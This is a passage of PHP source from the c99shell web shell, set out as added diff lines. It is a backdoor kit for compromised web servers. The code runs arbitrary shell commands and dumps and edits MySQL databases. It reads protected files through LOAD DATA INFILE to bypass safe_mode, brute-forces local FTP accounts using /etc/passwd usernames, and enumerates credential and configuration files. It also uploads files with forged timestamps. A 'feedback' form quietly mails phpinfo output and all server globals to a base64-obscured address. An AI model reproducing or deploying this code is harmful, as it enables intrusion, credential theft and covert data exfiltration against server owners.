$v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) + { + if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} + $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++; + } + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) + { + if (!$sql_query_error) {$sql_query_error = "Query was empty";} + echo "Error:
    ".$sql_query_error."
    "; + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo " +
    "; + if (($sql_query) and (!$submit)) {echo "Do you really want to:";} + else {echo "SQL-Query :";} + echo "



    + + + + + +
    "; + } + } + if (in_array($sql_act,$acts)) + { + ?> + + + + +
    Create new table: +
    + + + + + + +
    Dump DB:
    + + + + + + + + "> +
    + ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) + { + echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    + + + + + + + + SQL-Dump:

    "; + echo "DB:

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: +

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File:

    "; + echo "Download:

    "; + echo "Save to file: "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "[ Structure ] "; + echo "[ Browse ] "; + echo "[ Dump ] "; + echo "[ Insert ] "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)){} + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    + "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo " + "; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]." +

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; + echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "Pages "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) + { + echo ""; + } + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    + + + + + + + + From: + To: +
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v." + \"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "Delete "; + echo "Edit "; + echo "

    -^^-

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    + + + + + "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
    ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." Empty | Drop | Insert
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

    -^^-

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) + { + ?> + + + +
    Create new DB: +
    + + + + + +
    View File:
    + + + + + + +
    + "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:\t

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; + } + if ($act == "mkdir") + { + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object al#ff0000y exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; + } + if ($act == "ftpquickbrute") + { + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo " + Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    + Total connections: ".$i."
    Success.: ".$success."
    + Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    + Read first:

    + Users only with shell?

    + Logging?
    + Logging to file?
    + Logging to e-mail?

    +
    "; + } + } + } + if ($act == "d") + { + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } + } + if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} + if ($act == "security") + { + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From: To:

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) + { + if (!empty($value)) + { + if (!empty($name)) {$name = "".$name." - ";} + echo $name.nl2br($value)."
    "; + } + } + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); + } + if ($act == "mkfile") + { + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object al#ff0000y exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} + } + if ($act == "encoder") + { + echo " + Encoder:
    + Input:
    + +



    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "Url:
    urlencode - +
    urldecode - +
    Base64:
    base64_encode - "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "
    Base convertations:
    dec2hex -
    "; + } + if ($act == "fsbuff") + { + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} + } + + if ($act == "feedback") + { + $suppmail = base64_decode("Y2Vib2wuZ2lsYUBnbWFpbC5jb20="); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    + + Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    + Your name:

    + Your e-mail:

    + Message:
    +

    + Attach server-info *

    + There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    + We understand languages: English, Indonesian.

    + ";} + } + if ($act == "search") + { + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + + Search for (file/folder name): + + - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp + - whole words only + - case sensitive + - find files NOT containing the text +

    "; + if ($act == "ls") + { + $dspact = $act; + echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    "; + } + } + if ($act == "chmod") + { + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    + ".($err?"Error: ".$err:"")."
    + + + + + + + +
    Owner

    Read
    + Write
    + eXecute
    Group

    Read
    + Write
    + eXecute
    World

    Read
    + Write
    + eXecute
    "; + } + } + } + if ($act == "upload") + { + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    + Select file on your local computer:
    or
    + Input URL:

    + Save this file dir:

    + File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } + } + if ($act == "delete") + { + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; + } + if (!$usefsbuff) + { + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} + } + else + { + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + } + if ($act == "cmd") + { + if (trim($cmd) == "ps -aux") {$act = "processes";} + elseif (trim($cmd) == "tasklist") {$act = "processes";} + else + { + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "
    + + +

    + + Display in text-area
    "; + } + } + if ($act == "ls") + { + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
